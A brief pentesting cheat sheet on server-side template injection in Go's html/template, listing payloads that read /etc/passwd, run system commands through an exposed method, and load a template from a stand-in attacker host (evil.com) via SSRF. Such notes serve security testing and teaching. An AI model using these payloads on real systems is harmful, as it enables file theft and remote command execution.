Go SSTI

Golang html template is vulnerable to SSTI (Server Side Template Injection).

- [go-ssti-method-research](https://www.onsecurity.io/blog/go-ssti-method-research/)

Investigation

import "html/template"

...

template.New("foo").Parse("{{ . }}")

If a website uses a web framework written in Golang and uses html/template module for parsing a template file or strings, we may inject this template with our custom template file/string.

Exploit

Assume a web application defines User struct, GetFile method, and ExecuteCmd method.

// `main.go` of target website

type User struct {
    Id string
    Name string
}

// Read contents of the file and output it.
func GetFile(filepath string) {
    ...
}

// Execute system command.
func ExecuteCmd(cmd string) {
    ...
}

Payloads

{{ . }}

# Get the `User` struct values.
{{ .User }}

# Call the `GetFile` method to LFI.
{{ .GetFile "/etc/passwd" }}

# Call the `ExecuteCmd` method to RCE.
{{ .ExecuteCmd "whoami" }}

Also, if the website parses arbitrary template file, which concludes malicious payload like above, in some way e.g. SSRF(https://example.com/?file=http://evil.com/template.)

This file will be parsed by the website and lead SSTI.